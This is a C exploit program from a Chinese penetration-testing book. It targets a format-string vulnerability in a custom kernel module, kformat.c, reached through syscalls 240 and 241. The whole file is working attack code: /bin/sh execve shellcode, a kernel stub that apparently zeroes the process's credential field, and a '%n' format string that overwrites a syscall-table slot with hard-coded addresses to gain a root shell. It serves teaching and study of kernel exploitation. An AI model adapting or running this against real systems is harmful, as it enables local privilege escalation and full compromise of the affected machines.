/* kformat_exploit.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对kformat.c的利用程序
* gcc -o kformat_exploit kformat_exploit.c
*/
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <linux/unistd.h>
#include <linux/sysctl.h>
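/* Syscall numbers 240/241 are not standard Linux entries; they are presumably
 * registered by the kformat.c module this program targets (confirm against
 * that source). The wrappers have the shape
 *   int new_function(unsigned int len, char *code);
 *   int exploit(unsigned int len, char *code);
 * and are generated by the legacy _syscall2 macro from <linux/unistd.h>,
 * which modern kernel headers no longer provide. */
#define __NR_new_function 240
static inline _syscall2(int, new_function, unsigned int ,len,char * ,code);
#define __NR_exploit 241
static inline _syscall2(int, exploit, unsigned int ,len,char * ,code);
/* Filler byte for the code buffer in main(); the name is historical — 'A' is
 * padding, not an x86 nop. */
#define NOP 'A'
/* Address whose low/high bytes are emitted at the front of the format string
 * built in main(). The base is a hard-coded, build-specific constant; the
 * slot is indexed by __NR_exploit with a 4-byte stride. Fully parenthesised so
 * that expressions such as `RETLOC & 0xff` group as intended (the original
 * relied on `+` binding tighter than `&`). */
#define RETLOC (0xc02c209c + (__NR_exploit * 4))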
/* User-space payload string (the trailing text is "/bin/sh"); main() stores
 * its address into the 4-byte immediate inside shellcode[] before the
 * syscalls are made. The byte sequence is not annotated on this page. */
char shell[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Kernel-side stub. Bytes 1..4 (the 0xff placeholders following the first
 * opcode) are overwritten at runtime by main() with the address of shell[];
 * the stub ends with `iret`. The constants 0xffffe000 and the 0x128 offset
 * are hard-coded and presumably tied to one specific kernel build/layout —
 * nothing on this page derives them, so confirm before assuming they mean
 * anything elsewhere. The per-byte mnemonics are the original author's
 * annotations (one typo fixed below). */
char shellcode[]={
0xba,0xff,0xff,0xff,0xff,//mov $0xffffffff,%edx  (immediate patched by main())
0xb8,0x2b,0x00,0x00,0x00,//mov $0x2b,%eax
0x50,//push %eax
0x50,//push %eax
0x1f,//pop %ds
0x07,//pop %es
0x89,0xe0,//mov %esp,%eax
//next
0x83,0xc0,0x04,//add $0x4,%eax
0x8b,0x18,//mov (%eax),%ebx
0x83,0xfb,0x23,//cmp $0x23,%ebx
0x75,0xf6,//jne next
0x83,0xe8,0x04,//sub $0x04,%eax
0x89,0xc4,//mov %eax,%esp
0x89,0x10,//mov %edx,(%eax)
0xb8,0x00,0xe0,0xff,0xff, /*mov $0xffffe000,%eax*/
0x21,0xe0, /* not annotated by the author */
0xc7,0x80,0x28,0x01,0x00,0x00,0x00,0x00,0x00,0x00,/*movl $0x0,0x128(%eax) */
//0x5b,//pop %ebx
//0x58,//pop %eax
0xcf /* iret */
};
/* Buffer for the format string handed to the custom syscalls. The initial
 * text is only a placeholder documenting the intended layout
 * ("<retloc bytes>|%<len>p|%n"); main() overwrites it with snprintf/sprintf
 * before it is used. */
char formatstrings[256] = "retloc|%len|%n";
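/* Build the format string for the kformat.c demo and pass it to the two
 * custom syscalls.
 *
 * formatstrings layout (see the snprintf below): the four bytes of RETLOC in
 * little-endian order, then "%<N>p%n" with N = (int)shellcode - 4, so the
 * character count reached at the %n equals the address of shellcode[].
 * The code buffer is padded with NOP and its first 256 bytes replaced by the
 * format string; `len` is the byte count passed to both syscalls.
 *
 * Assumes a 32-bit build: pointers are truncated through `int` casts and the
 * immediate patched into shellcode[] is four bytes wide. argc/argv are
 * unused. Return values of the two syscalls are not checked (as in the
 * original); returns 0.
 */
int main(int argc, char **argv)
{
    char code[1024];
    unsigned int len = 256;

    (void)argc;
    (void)argv;

    /* Overwrite the 4-byte 0xff placeholder at shellcode+1 with the
     * user-space address of shell[]. */
    *(int *)(shellcode + 1) = (int)shell;

    memset(code, NOP, sizeof code);

    printf("shellcode addr is:%p\nshell addr is %p\n", shellcode, shell);

    /* Bounded write: the output is 4 chars + "%" + a decimal + "p%n", well
     * under 256 bytes, but snprintf keeps that a guarantee rather than luck. */
    snprintf(formatstrings, sizeof formatstrings, "%c%c%c%c%%%dp%%n",
             RETLOC & 0x000000ff,
             (RETLOC & 0x0000ff00) >> 8,
             (RETLOC & 0x00ff0000) >> 16,
             (RETLOC & 0xff000000) >> 24,
             (int)shellcode - 4);

    /* Printed through "%s" so the embedded %n is displayed, not interpreted. */
    printf("%s", formatstrings);
    fflush(stdout);

    memcpy(code, formatstrings, sizeof formatstrings);
    new_function(len, code);
    exploit(len, code);
    return 0;
}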